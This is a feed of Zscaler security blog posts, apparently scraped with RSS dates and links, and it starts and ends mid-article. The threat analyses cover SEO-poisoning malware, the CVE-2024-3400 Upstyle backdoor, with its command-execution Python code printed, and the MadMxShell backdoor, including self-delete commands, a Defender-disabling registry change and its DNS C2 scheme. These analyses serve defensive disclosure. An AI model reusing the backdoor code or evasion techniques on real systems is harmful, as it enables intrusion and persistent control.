scrutinize emails for withdrawal requests associated with cryptocurrency trading. Upon identifying a match, it proceeds to modify the email content to resemble a sign-in email, thereby altering the appearance for deceptive purposes. Additionally, it includes functionality within the getCode function, highlighted in the figure below, to extract and validate six-digit authentication codes received via email using regular expressions. Figure 13: JavaScript code that monitors and modifies email content. The screenshot below shows a list of cryptocurrency exchanges and titles required for email modification. Figure 14: List of cryptocurrency exchanges and titles required for email modification. The screenshot below shows the post-infection network traffic. Figure 15: A screenshot of post-infection traffic. ConclusionThis campaign underscores the exploitation of user behavior by attackers who leverage Black Hat SEO, specifically SEO poisoning, to spread malware, ultimately aiming to extort victims for financial gain and other benefits. These analyzed campaigns rely on users' engagement with seemingly “trustworthy” websites to initiate the infection process. Individuals can effectively prevent such harmful infections by refraining from downloading software from suspicious sources. Instead, they should prioritize visiting reputable websites and exclusively download software from trustworthy sources. Zscaler CoverageAdvanced Threat Protection JS.Trojan.Agent HTML.Phish.SEO W32/Satacom.C.gen!Eldorado W32/Kryptik.LQU.gen!Eldorado Advanced Cloud SandboxDuring our investigation of this campaign, the Zscaler Cloud Sandbox played a significant role in analyzing the behavior of multiple files. Figure 16: Zscaler Cloud Sandbox report Indicators Of Compromise (IOCs)aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2t9z[.]lol/imvLbzv05Wgood2-led[.]com/dark4.bs641blob[.]monster/pidaras/142.bindark-confusion[.]com26B980E5A79883830EBE9E588867F9A7E0B000BD86ACE23AB5D94FC44480D8B32ECE1BB679CB143D84BBA1F114288101Scam sites goodclassic.weebly.com entrancementace.weebly.com ngbris.weebly.com evercomplete908.weebly.com cleversrus897.weebly.com auctionsyellow900.weebly.com renewdecor526.weebly.com newbr594.weebly.com evertango.weebly.com finalrenew.weebly.com promogood.weebly.com renewinfinite.weebly.com intelxs.weebly.com yooever621.weebly.com talentyellow.weebly.com automotiveload178.weebly.com dota2giveaway2017.weebly.com newdi.weebly.com bargainslasopa612.weebly.com multiprogramsy273.weebly.com nutukotixirijir.weebly.com marketever326.weebly.com keenmouse307.weebly.com ilidatickets.weebly.com managebrown.weebly.com giwezodos.weebly.com forfasr600.weebly.com purpleshara.weebly.com lasopasolutions860.weebly.com yellowcopy.weebly.com ruclever.weebly.com lasopabali332.weebly.com eternalfasr766.weebly.com locatorlasopa581.weebly.com trainingenergy.weebly.com reneweasy.weebly.com smallbusinesscelestial.weebly.com fasrsonic952.weebly.com lasopadigital325.weebly.com honestlasopa869.weebly.com newrider.weebly.com lastitalian658.weebly.com swagpowerup.weebly.com entrancementsan.weebly.com fasrpinoy260.weebly.com engnice.weebly.com slotsmaps712.weebly.com skyeylane.weebly.com lasopaon950.weebly.com plclever.weebly.com heavenlystudy.weebly.com cafed0wnload.weebly.com bucketyellow.weebly.com sunnyfasr390.weebly.com treecargo349.weebly.com mlsfasr616.weebly.com potentmark.weebly.com tbsoha.weebly.com borenew.weebly.com aifasr879.weebly.com pinuxijevafu.weebly.com casefasr300.weebly.com multiprogrammeister.weebly.com yulasopa966.weebly.com divafasr820.weebly.com gootoy.weebly.com sadapazixome.weebly.com generousnurse.weebly.com fasrpars454.weebly.com siteearth.weebly.com juheavy.weebly.com magkeen.weebly.com yellowacademy158.weebly.com bazarredled.weebly.com pamikifatiril.weebly.com smsenergy.weebly.com brownfield571.weebly.com streamfasr559.weebly.com boxli.weebly.com huntergood.weebly.com daeyuni.weebly.com facealpine.weebly.com mpxilus853.weebly.com programrevolution503.weebly.com supernalpig.weebly.com collectiveeagle905.weebly.com fitroom.weebly.com cleversalsa709.weebly.com lasopafoot166.weebly.com ilikefasr787.weebly.com vinokiwofexuge.weebly.com depositpizza292.weebly.com multifileslong832.weebly.com dopworld.weebly.com everpico.weebly.com politicalgreenway.weebly.com ityellow.weebly.com generouseu.weebly.com abcceleb.weebly.com aspoynerd.weebly.com neuroheavy.weebly.com treedisco771.weebly.com goomoves.weebly.com generousmetrix.weebly.com endfasr772.weebly.com erssupernal855.weebly.com fasrlegacy770.weebly.com potlasopa889.weebly.com energystrategy.weebly.com metaskyey.weebly.com keeniso.weebly.com musicalesta.weebly.com everpump710.weebly.com purpleclever657.weebly.com picturefasr318.weebly.com informationfasr831.weebly.com d0wnloadoption.weebly.com cleverlinked608.weebly.com universalpowerful.weebly.com lasopababe663.weebly.com binarypowerful617.weebly.com renewvector802.weebly.com newlineemporium.weebly.com fasrcore874.weebly.com dopolijakom.weebly.com misolopov.weebly.com texasgroovy657.weebly.com barname.weebly.com debtcrack.weebly.com prioritysoft828.weebly.com intellifasr780.weebly.com entrancementsing.weebly.com engangry.weebly.com airvoper.weebly.com baldcircleyouth.weebly.com buyerstwink.weebly.com lasoparetail499.weebly.com savvytree583.weebly.com bonusny428.weebly.com lasopacleaning304.weebly.com logskiey.weebly.com fasrphotography956.weebly.com gatewayface.weebly.com grayenergy306.weebly.com glammonkey.weebly.com companionclever103.weebly.com forlifepotent.weebly.com washingtonclever.weebly.com hotellasopa281.weebly.com yellowforms.weebly.com lasopajava575.weebly.com nestilida.weebly.com saydigital113.weebly.com sharamoves718.weebly.com petsfasr837.weebly.com playlicious.weebly.com partnersmultiprogram.weebly.com labelbaldcircle387.weebly.com casinowoo88.weebly.com medfastpower.weebly.com groundlasopa592.weebly.com entrancementtab.weebly.com talknitro.weebly.com heavypersian.weebly.com heavenlyproduct517.weebly.com Strings eigenlayer trbinance publisher checkout onedrive azurewebsites billing secure digicert coinbase evernote crypto admin dashboard cashier bitwarden opensea metamask exchange wallet swap tradeogre stake mining steamcommunity dana-na remote global-protect cscoe citrix LogonPoint screenconnect XenApp vpn silentDetection rdweb microsoftonline stripe.com privateemail.com ads.google adsense.google.com admin.booking.com ads.microsoft.com business.facebook.com ads.facebook adsmanager.facebook payments.google.com pay.google.com virustotal.com bankofamerica.com Wed, 24 Apr 2024 08:31:01 -0700 Kaivalya Khursale https://www.zscaler.com/blogs/security-research/black-hat-seo-leveraged-distribute-malware https://www.zscaler.com/blogs/company-news/2024-zscaler-partners-of-the-year Last week at the Zscaler Americas Executive Partner Summit we announced our 2024 Americas Partners of the Year. The Zscaler Partner Ecosystem is a key differentiator and force multiplier for us in the market; from deep technology integrations, key consultancy partnerships, solutions and services partners. We have the best partners in the business. Our thriving partner ecosystem continues to grow and excel as we secure and serve the world’s largest and most renowned organizations. And our partners continue to select and invest in Zscaler as the leading Zero Trust and AI vendor in their portfolio. While each partner is unique, this year’s cohort of winners have all demonstrated significant business growth, innovation, and investments with Zscaler. We are winning together. To each of our award winners, THANK YOU for your hard work and dedication, and for consistently investing in our partnership. The co-development, innovation, and customer obsession we share enables us to better serve and secure organizations all over the world. We are stronger together; delivering superior business outcomes in the ever evolving digital transformation landscape. Congratulations to our esteemed 2024 Americas Partner of the Year Award Winners: Partner of the Year: World Wide Technology GSI Partner of the Year: Accenture Go-to-Market Alliance Partner of the Year: CrowdStrike Cloud Alliance Partner of the Year: AWS Zero Trust Solution Partners of the Year: CrowdStrike & Okta Emerging Tech Partner of the Year: Rubrik GSI Managed Zero Trust Security Partner of the Year: Wipro GSI Growth Partner of the Year: Infosys Services Partner of the Year: Optiv Growth Partner of the Year: SHI PubSec Partner of the Year: Red River New Logo Partner of the Year: CDW These awards recognize our partners who have gone above and beyond, and excelled in our ecosystem. We are proud and grateful for these partnerships as we jointly deliver unparalleled customer experiences and innovation. Thank you to each of our award winners for your partnership. We cannot wait to see all of the great achievements in the years to come. Fri, 19 Apr 2024 10:49:53 -0700 Karl Soderlund https://www.zscaler.com/blogs/company-news/2024-zscaler-partners-of-the-year https://www.zscaler.com/blogs/zscaler-life/zscaler-supports-steve-gibbins-tour-21-fundraising Every year, 176 cyclists and millions of spectators descend on France for one of the most gruelling sporting events in the world, le Tour de France. A race steeped in history, and those who adorn the streets – and the billions of spectators who tune in on TV – do their utmost to empathise with the pain and suffering of the professionals as they ascend climbs such as Alpe d’Huez and Mont Ventoux. Few people truly understand the grit, determination, and fitness needed to complete the race. However, the team at Tour 21 are all too familiar with the demanding requirements of le Tour. Every year, one week ahead of the official race, a team of 15 amateur cyclists take to the tarmac and ride the full Tour de France route, and all in the name of a good cause. We’re very excited to share that Zscaler will be supporting Steve Gibbins’ Tour 21 Fundraiser for Cure Leukaemia, a blood cancer charity providing patients with access to new and potentially lifesaving treatments by facilitating clinical trials. While great progress is being made, Cure Leukaemia’s work remains vital for so many people. In fact, according to Cancer Research UK: There are almost 10,000 new cases of leukaemia each year 4,830 people died from leukaemia between 2017 – 2019 41% of people survive leukaemia for 10 or more years 12% of leukaemia cases are preventable Alongside being an enthusiastic amateur cyclist, Steve is the Head of Networks at Jaguar Land Rover (JLR) responsible for the cloud-infrastructure transformation of the organisation, a longstanding client of Zscaler and valued customer since 2017. As Steve embarks on the daunting Tour 21 challenge alongside 15 other amateur cyclists, covering an astounding 3500 km in just 21 days from Florence to Nice, his mission to raise £1 million for Cure Leukaemia is nothing short of inspirational. “Seeing and understanding the incredible work that Cure Leukaemia is doing through the Trial Acceleration Programme, and the incredible progress that has been achieved so far by them, is truly inspirational. However, there is still a way to go before this terrible disease is completely beaten, which is why raising this money is so incredibly important. Zscaler’s support has been truly outstanding and puts fuel in my tank on those tough training days, knowing that this amazing organisation is behind me all the way”, Steve Gibbins adds. At Zscaler, we’re proud to support one of JLR’s champions as he pedals towards his ambitious fundraising goal, embodying the spirit of perseverance, community, and hope. Hence we have donated £10,000 already, which has contributed to half of Steve’s fund raising target – but our support doesn’t end there. To bolster our backing, we rallied our London-based team together for a group spin class last week. With over 20 colleagues and Steve himself in attendance, the collective effort provided a huge source of motivation and inspiration as well as showing great team spirit for the cause. Considering how challenging the spin class was for us, we commend Steve as riding 3500 km and climbing more than 52,000 altitude metres in the French and Italian Alps as well as the Pyrenees seems unfathomable! Roxy Uddin, proud participant of the spin class comments: “Having worked alongside Steve Gibbins and his cloud transformation journey for JLR for two years now, I'm so proud that Zscaler are able to support Steve as he takes on this huge challenge. The spin class itself was great fun (and tougher than expected!) and really brought the whole Zscaler team together to focus on this bigger fundraising task. On April 23rd, we take the team spirit and fundraising activities to the next level. We’re coming together with JLR at the Velodrome in London, to dive deeper into the Tour 21 feeling, telling you more about Steve's fundraising journey with insights from guest speakers representing charities raising awareness about leukaemia and Tour 21 itself. But that’s not all… we’ll be hopping on our bikes for an exciting track cycling session afterwards. We're excited to have so many people join us to help Steve to fundraise and spread the word for Cure Leukaemia. You still have time to sign up for our Velodrome Track Day, and you can check out the complete schedule at the link below. We hope to see you there! Fri, 19 Apr 2024 05:29:48 -0700 Paul Hennin https://www.zscaler.com/blogs/zscaler-life/zscaler-supports-steve-gibbins-tour-21-fundraising https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis IntroductionRecently, a zero-day command-injection vulnerability, assigned to CVE-2024-3400, was found in the Palo Alto Networks PAN-OS. It was assigned the maximum severity score of 10.0 and can be exploited by an unauthenticated user to run arbitrary commands on the target system with root privileges.Volexity was the first to identify and report the vulnerability. Since then, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its Known Exploited Vulnerability Catalog.In this blog, we will share the vulnerability exploitation activity observed by Zscaler’s global intelligence network. And, we will examine the recently-discovered Python-based backdoor and its novel interaction mechanism with the operator.Key TakeawaysZscaler’s global intelligence network picked up CVE-2024-3400 activity right after the exploitation script was released.The backdoor utilizes a .pth file for auto-execution and employs a novel indirect interaction with the backdoor by sending commands via error logs and receiving the output through a publicly accessible stylesheet.On the same day the vulnerability was publicly disclosed, a Python-based exploit script was also released to the public on GitHub, making it easier for other threat actors to exploit or test Palo Alto appliances for this vulnerability. Activity Observed by ZscalerZscaler’s global intelligence network picked up activity from various known malicious sources targeting appliances across multiple customers. This activity was picked up almost immediately after the publication of the exploitation script on GitHub. The activity does not appear to target any particular region or industry vertical.Most of the activity observed originated from malicious IPs already known to be associated with vulnerability scanning, Redline Stealer, and EvilProxy. However, one IP stands out from this group. We believe the IP address 67.55.94[.]84 is associated with a VPN provider. No other activity from this IP has been observed. Currently, there is insufficient evidence to attribute this IP to any specific threat actor.Technical AnalysisWe suspect the attackers intended to incorporate Upstyle in their attack sequence. Upstyle, a sophisticated backdoor initially identified by Volexity, employs innovative techniques for persistence, command reception, and output sharing with the operator. Attack flowThe figure below shows how the attack flow would unfold.Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. Upstyle backdoorThe Upstyle backdoor consists of three layers.The first outer layer is the installer which contains the next layer in a base64-encoded format.Layer 1 - InstallerThe installer layer writes the next layer to the following path: /usr/lib/python3.6/site-packages/system.pth. Additionally, it will set the last access time and last modified time of the system.pth file to the same respective time as the installer script.Finally, the installer script deletes itself and the /opt/pancfg/mgmt/licenses/PA_VM`* file.The file path and the extension have special significance. Since the release of Python 3.5, any .pth file under site-packages is run at every Python startup and the lines starting with import (followed by space or tab) are executed, thereby setting up a unique auto-execution mechanism for the malicious code whenever any Python code is run on the system.Layer 2 - LauncherThis layer contains the functional backdoor as another base64-encoded blob of code. It contains two functions named protect and check.protect: This function likely protects the persistence mechanism and makes sure the backdoor stays in the system.pth file. It reads the contents of system.pth and adds a handler for the termination signal. The handler will write back the contents of the system.pth file before terminating. check: This method is called after the protect method. It will check if the process command line contains /usr/local/bin/monitor mp by checking the file /proc/self/cmdline. If it does, the backdoor code will be executed. This could be a way to control the execution of the backdoor and avoid running multiple duplicates of the backdoor thread.Layer 3 - BackdoorOn start, this backdoor will read the content, last access time, and last modified time of the file /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css so it can be restored later.Then, it goes into an infinite loop and starts monitoring the error log file at /var/log/pan/sslvpn_ngx_error.log looking for one of the following regular expressions: img\[([a-zA-Z0-9+/=]+)\] or img\{base64encoded_command}\ as shown in the code snippet below.When the pattern is found, the command is base64 decoded, executed, and the output is appended to the bootstrap.min.css file inside the comment tags, /* {command output here} */.Finally, the log file is purged of the attacker’s generated error logs containing the malicious commands, and the error-log-file timestamps are restored. After 15 seconds the content and timestamps of the bootstrap.min.css file are also restored.-- [snip] -- css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css' content = open(css_path).read() atime=os.path.getatime(css_path) mtime=os.path.getmtime(css_path) while True: try: SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]' lines = [] WRITE_FLAG = False for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines(): rst = re.search(SHELL_PATTERN,line) if rst: WRITE_FLAG = True cmd = base64.b64decode(rst.group(1)).decode() try: output = os.popen(cmd).read() with open(css_path,"a") as f: f.write("/*"+output+"*/") except Exception as e: pass continue lines.append(line) if WRITE_FLAG: atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log") mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log") with open("/var/log/pan/sslvpn_ngx_error.log","w") as f: f.writelines(lines) os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime)) import threading threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start() except: pass time.sleep(2) -- [snip] --- ConclusionCVE-2024-3400 is a high severity vulnerability. There was an uptick in malicious activity soon after an exploit script was released to the public on GitHub.The founding principles of the Zero Trust Exchange Platform™, a zero trust architecture, and Defense-in-Depth (DiD) should be used in combination to defend against such attacks. In addition to deploying detection rules and monitoring for suspicious activity in environments, security teams should also adopt deception engineering. Strategic use of this technology can make it difficult for the adversary to move in the environment without tripping alerts.Indicators Of Compromise (IOCs)Vulnerability scan originating IPsIPComment23.227.194.230Known Malicious IP154.88.26.223Known Malicious IP206.189.14.205Known Malicious IP67.55.94.84SaferVPN IPSHA256 Hashesab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f33de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb Wed, 17 Apr 2024 18:11:50 -0700 Atinderpal Singh https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis https://www.zscaler.com/blogs/product-insights/how-zscaler-saas-security-and-data-discovery-reports-are-healthcare-s SaaS Security Report: A Not-So-Secret Identity Imagine a world where the heroes don't wear capes, but wield reports. And not just any reports: we're talking about the Zscaler SaaS Security Report, a document powerful enough to illuminate the darkest corners of healthcare organizations’ IT environments. Picture shadow IT as a quirky sidekick who means well but always ends up downloading rogue software that promises to “make work easier” or “automatically order pizza on Fridays.” Shadow IT is like the friendly custodian who “helps” organize your supply closet, and then you suddenly can't find your gloves or the superhero bandages for the pediatric patients. They’re there somewhere, hidden behind the paper towel rolls on the top shelf. Enter Zscaler, swinging in to reveal these well-intentioned but potentially hazardous endeavors. By identifying unsanctioned apps and services, the SaaS Security Report helps healthcare organizations wrangle the chaos, securing the network while still allowing for innovation (and maybe the occasional pizza). Data Discovery Report: The Unsung HeroOn the other side, we have the Data Discovery Report. This is our answer to the eternal question: “Where did I leave that incredibly sensitive patient data?” Think of it as the healthcare organization's memory enhancer, ensuring that no piece of critical information ends up in the wrong hands or, worse, on a USB stick in the washing machine. This report is like an organizational expert for data, categorizing and securing it in ways that would make any mom proud. It tells you exactly where your data lives, breathes, and occasionally goes out for a walk, making sure it's always safe and sound. It's particularly adept at flagging data that's decided to take an unscheduled vacation outside the secure confines of the healthcare network—like when your staff decide “Print to PDF” isn’t working, so they use a free converter they find on the internet. With the Data Discovery Report, you can see exactly who did that and which files they uploaded. The Dynamic Duo's AdventuresTogether, the SaaS Security Report and the Data Discovery Report are the dynamic duo of the healthcare IT world, fighting data breaches and compliance issues with the power of insight and analysis. They roam the digital corridors of hospitals and clinics, doing their part to keep patient data as secure as the pharmacy. Episode 1: The Case of the Vanishing Patient RecordsIn this thrilling adventure, our heroes face mysteriously disappearing patient records. The SaaS Security Report, with its keen eye for detail, finds that a well-meaning staff member has been using an unsanctioned cloud storage service to make their work “more efficient.” Meanwhile, the Data Discovery Report, always the detective, pinpoints exactly which files went on this unauthorized excursion. Episode 2: The Saga of the Shadowy SoftwareThis time, a shadowy figure has infiltrated the network with software promising to “revolutionize patient care.” Spoiler alert: it created a gaping security hole instead. But fear not! With the help of the SaaS Security Report and Data Discovery Report, IT staff quickly unmask the rogue application. The Moral of the StoryIn the end, the Data Discovery Report and SaaS Security Report don't just increase a healthcare organization's security posture—they do it with flair, bringing a smile to even the most overworked IT professional's face. You can now see exactly which apps your users are using so that you can create policy, or see if someone is taking data they shouldn’t and uploading it to a mysterious source. With these two reports, your IT team can perform even greater feats of heroism. Want to know more? Visit our Healthcare page! Tue, 16 Apr 2024 13:59:17 -0700 Steven Hajny https://www.zscaler.com/blogs/product-insights/how-zscaler-saas-security-and-data-discovery-reports-are-healthcare-s https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell IntroductionBeginning in March of 2024, Zscaler ThreatLabz observed a threat actor weaponizing a cluster of domains masquerading as legitimate IP scanner software sites to distribute a previously unseen backdoor. The threat actor registered multiple look-alike domains using a typosquatting technique and leveraged Google Ads to push these domains to the top of search engine results targeting specific search keywords, thereby luring victims to visit these sites. The newly discovered backdoor uses several techniques such as multiple stages of DLL sideloading, abusing the DNS protocol for communicating with the command-and-control (C2) server, and evading memory forensics security solutions. We named this backdoor “MadMxShell” for its use of DNS MX queries for C2 communication and its very short interval between C2 requests. In this blog, we will examine the campaign details, threat actor's infrastructure, and a detailed technical analysis of the backdoor. We have also shared a custom Python script to decode C2 traffic for malware samples and all the Indicators of Compromise (IOCs) linked to this campaign. Key Takeaways Between November 2023 and March 2024, multiple domains were registered by a threat actor spoofing legitimate IP scanners and other software typically used by IT security and network administration teams in enterprises. The threat actor abused Google Ads to conduct a malvertising campaign in an attempt to push their malicious sites to the top of search results. A successful infection results in the delivery of a previously unseen backdoor that we named “MadMxShell”. The backdoor uses techniques such as multiple stages of DLL sideloading and DNS tunneling for command-and-control (C2) communication as a means to evade endpoint and network security solutions, respectively. In addition, the backdoor uses evasive techniques like anti-dumping to prevent memory analysis and hinder forensics security solutions. BackgroundThe selection of spoofed software by this threat actor suggests that their targets primarily consist of IT professionals, particularly those in IT security and network administration roles. This aligns with the recent trend observed where advanced persistent threat (APT) groups, such as NOBELIUM, crafted attacks targeting these teams. With their privileged access to internal systems and networks, IT security and network management teams are attractive targets for both APT groups and initial access brokers (IABs) that sell access to compromised networks. Although we have not yet attributed the attack described in this blog to a specific threat actor, it is important to highlight this emerging trend. Threat actors have previously leveraged Google malvertising to distribute trojanized versions of a specific port scanning tool called Advanced IP Scanner, as described in reports by Kaspersky, BlackBerry, and Huntress. Although the campaign discussed in this blog uses a similar distribution method, the range of spoofed software has been expanded beyond Advanced IP Scanner. Furthermore, to the best of our knowledge, the final malware delivered in this campaign has not been publicly documented before. Due to these significant differences, we assess with a high-confidence level that this campaign was conducted by a different threat actor. Attack ChainThe figure below illustrates the multi-stage attack chain at a high level. Figure 1: The MadMxShell end-to-end attack-chain, which starts with malvertising, followed by multiple intermediate stages of DLL sideloading, and finally DNS tunneling to the C2 server. Technical AnalysisIn the following section, we provide a detailed analysis for each stage of the attack chain. Google malvertising campaignThe modus operandi of the threat actor includes registering multiple look-alike domains spoofing popular port scanning software and pushing them to the top of Google search results by running Google Ads campaigns. This technique is widely known as malvertising. During our investigation, we observed users being served these ads when they searched for keywords related to any of the following: Any of the legitimate port scanning and IT management software spoofed by this threat actor Advanced IP Scanner Angry IP Scanner PRTG IP Scanner by Paessler Manage Engine Network admin tasks related to virtual local area networks (VLANs) Scanning IP protocol The figure below shows details of the Google Ads campaign carried out by the threat actor in March 2024 for one of the malicious domains. The domain in question was advanced-ip-scanz[.]net, and the search keywords were: "advanced ip scanner" "ip address scanner" Figure 2: Details of the Google Ads campaign in March 2024 for the malicious domain advanced-ip-scanz[.]net. Once the user clicks on any of the attacker-controlled Google Ads, they are redirected to a look-alike site for the corresponding IP scanning software. Malicious sitesThe threat actor registered multiple sites masquerading as legitimate IP and port scanner software programs. One such site we observed is advansed-ip-scanner[.]net, which is a look-alike site of the legitimate Advanced IP scanner software www.advanced-ip-scanner[.]com. The complete source code of the fraudulent website mirrors the legitimate site, with the exception of minor edits made by the threat actor to JavaScript (JS) code which redirects the user to download a malicious file when they click the download button. The figure below shows a comparison between the altered JS code from the malicious file and the original legitimate website. The createFunctionWithTimeout function was modified to redirect users to download a malicious ZIP archive file from the following URL: advansed-ip-scanner[.]net/yftyudruo.php. Figure 3: JavaScript code comparison between the legitimate website’s createFunctionWithTimeout function and the malicious website's code. Backdoor Details - Binary AnalysisStage 1 injectorThe analysis in this blog is based on this ZIP archive: Advanced-ip-scanner.zip (SHA256:7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015). The ZIP archive contains two files: Advanced-ip-scanner.exe: A renamed copy of the legitimate Microsoft EXE oleview.exe. IVIEWERS.dll: A 22 MB DLL, which contains the stage two payload. This DLL is padded with an unused overlay of 10 MB which prevents scanning by security products that limit the size of analyzed files. When Advanced-ip-scanner.exe is run, it sideloads IVIEWERS.dll which executes a series of heavily obfuscated shellcodes extracted from various locations within the .rsrc section of the DLL. The final shellcode extracts and decodes an executable file with the XOR key 5dsadas435235bgdsgdfbvb3253453425345gfdsgfdgdf from resource AT21 of the DLL and injects it into a new Advanced-ip-scanner.exe process via process hollowing. Stage 2 dropperThe injected EXE file contains the next stage payloads in resource ID 202, encoded with a hardcoded 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 and compressed with zlib. Each encoded byte in this resource is padded with seven null bytes, resulting in a 10MB file, likely as another anti-scanning technique. This is shown in the figure below. Figure 4: The encoded and compressed stage 3 payload in the resource. After decoding and decompressing the resource, two files, OneDrive.exe and Secur32.dll, are dropped into %LOCALAPPDATA%\Microsoft\OneDrive\Update. The dropper deletes the stage 1 EXE with the following command before executing the dropped OneDrive.exe with ShellExecuteExW: cmd.exe /C for /l %x in (0,0,0) do (ping -n 3 127.0.0.1 > NUL & for %p in ("<PATH>\Advanced-ip-scanner.exe") do (del /f /q %p & if not exist %p exit))Stage 3 launcherOneDrive.exe, a legitimate signed Microsoft EXE, is abused to sideload Secur32.dll which sets up persistence for OneDrive.exe before executing the embedded stage 4 shellcode. Data from Secur32.dll’s icon resource ID 202 is XOR decoded to obtain the stage 4 shellcode. This is shown in the figure below. Figure 5: The icon resource with the encoded stage 4 payload. The first 16 bytes of the resource contain an encoded key for the payload that follows it. Each of the first 8 lowercase characters (onedrive) of the current process filename is added to every second byte of the encoded key to derive the XOR key F2 78 CD 9B 85 32 1D 07 33 C4 A0 21 98 A2 95 E3, as shown in the figure below. This prevents the correct decoding of the next stage payload if Secur32.dll was not sideloaded by OneDrive.exe. Figure 6: Generating the XOR key to decode the stage 3 shellcode. The malware then attempts to disable Windows Defender by setting HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware to 1 in the registry. It configures a scheduled task named “OneDrive Update” that executes %LOCALAPPDATA%\Microsoft\OneDrive\Update\OneDrive.exe when the current user logs on to Windows before redirecting to the next stage. Stage 4 backdoorThe shellcode is a backdoor that allows the threat actor to collect system information, execute commands via cmd.exe, and perform basic file manipulation operations such as reading, writing, and deleting files. To deter analysis and detection, the malware decodes the code of each function with an 8-byte XOR key F2 09 CD 2D 85 CD 1D A3 (same key used in stage 2), calls the function, and then immediately re-encodes the code. In the figure below, the code excerpt on the right is decoded from the original bytes on the left. We can observe that even after decoding, it still needs to perform an additional step of decoding the get_c2_domain function before it can call it. The function code is re-encoded back to its original state before execution continues. This ensures that there is never a fully decoded copy of the shellcode in memory at any point of execution. Most sensitive strings and data, such as the C2 domain, lookup table for encoding/decoding C2 communications, and aforementioned XOR key, are also stored as stack strings to hinder analysis. Figure 7: Function bytes before and after decoding. Note that the decoded function includes calls to decode and encode other functions called within it. The malware generates a 4-byte session ID with the CryptGenRandom API and a victim ID by concatenating the hard disk serial number, computer name, and username, and taking the first 8 bytes of its MD5 hash. C2 ProtocolThe malware communicates with the C2 server, litterbolo[.]com, by sending requests and receiving commands encoded within DNS MX queries and responses. The malware supports the requests described in the table below. TypeNameDescription0HeartbeatIndicates that the malware is ready to accept the next command.1RegistrationSent as the first request of a session or when the C2 issues a re-registration command (type 1 command).2Command acknowledgementAcknowledges the receipt of C2 commands.4System info command resultContains system information collected for type 4 commands.5Shell command resultContains shell output for type 5 commands.6File command resultContains file and/or directory data for type 6 commands.Table 1: A table describing the requests supported by the malware during C2 communication. Figure 8: A diagram depicting the MadMxShell C2 communication loop. For each session, the malware first sends a registration request (type 1) to the C2 server. Once the C2 server acknowledges the registration request, the malware sends a heartbeat request (type 0) to the C2 server. The C2 server will respond with any of the following commands from the table below. Command TypeSubcommandDescription0N/ASends a heartbeat.1N/ARe-register with C2.2N/AC2 acknowledges receipt of specified packet and indicates that the malware should send the next packet (for request messages split into multiple packets). 4N/ACollects system information, like: Computer name User name Ethernet IP addresses Windows OS version Processor name Display card name RAM size 50Start cmd.exe process.1Terminate cmd.exe process.2Execute command via existing cmd.exe process created with subcommand ID 0.60List files and directories if path is specified, otherwise list all drives.1Write or append content to file.2Read from file.3Delete file or directory. Files are deleted with the DeleteFileW API, while directories are deleted with this command: cmd.exe /c rmdir "<DIR_NAME>" /s /q.Table 2: The commands and subcommands supported by the malware. The malware then acknowledges the command with a command acknowledgement request (type 2) before executing the specified command. After completing the commands for types 4, 5, and 6, the malware sends the results to the C2 server. The malware then repeats the entire process by sending a heartbeat request (type 0) to retrieve the next command. Data Encoding The malware sends requests to the C2 server by encoding the data in the subdomain(s) of the Fully Qualified Domain Name (FQDN) in a DNS MX query packet. The C2 responds similarly by encoding its commands as subdomain(s) in the corresponding DNS MX response packet. Each byte of binary data is converted into a pair of alphanumeric characters using a custom encoding scheme involving a hardcoded 36-character lookup table. Blocks of 60 alphanumeric characters are separated by a “.” character to represent a subdomain name. Python code for decoding these subdomains into the original request and C2 messages can be found in our GitHub repository. Because the malware uses a maximum of 224 characters for the FQDN and the C2 domain name cannot be used to encode data, each DNS packet can only transfer up to 103 bytes. Requests and commands that exceed this size are split into multiple DNS packets and are sent sequentially after the other party has acknowledged receipt of the previous packet. Possibly due to the limited bandwidth of the C2 protocol, this malware is configured with relatively short intervals (3 seconds) between requests. Because of this, its C2 traffic is significantly more noisy than the typical malware utilizing HTTP for C2 communication. Commands received from the C2 (after decoding) are structured as shown in the table below. OffsetLengthNameDescription0x04Query numberStarts from 0 per session.0x44ChecksumAdler-32 checksum of entire message data.0x84Packet numberA single message may be split into multiple packets. Starts from 0 for each message.0xC4Message lengthTotal length of the message. This field is only present in the first packet of a message.0x10VariesMessage dataThe first byte of the message contains the command ID. The structure of subsequent bytes differs slightly for each command type.Table 3: The C2 message structure. For example, the C2 server for this sample always responds with 33qqooggxr77mdxx88jj6600ev44yyzz9bee99wwuu.litterbolo.com upon receiving a registration request. This is decoded as 00 00 00 00 03 00 0f 00 00 00 00 00 05 00 00 00 02 00 00 00 00 and represents the following message: Query number: 0 Checksum: 0xF0003 Packet number: 0 Message length: 5 Data: 02 00 00 00 00 (this is an acknowledgement from the C2 that it received packet 0) Likewise, the requests sent to the C2 server (before encoding) are structured as shown in the table below. OffsetLengthNameDescription0x04Session IDAn ID randomly generated when the malware is started.0x48Victim IDThe first 8 bytes of an MD5 hash of the hard disk serial number, computer name, and user name.0xc4Query numberStarts from 0 per session and is incremented for each DNS query sent to the C2 server.0x104ChecksumThe Adler-32 checksum of entire message data.0x144Packet numberA single message may be split into multiple packets. Starts from 0 for each message.0x184Message lengthTotal length of the message. This field is only present in the first packet of a message.0x1cVariesMessage dataThe first byte of the message contains the request type. 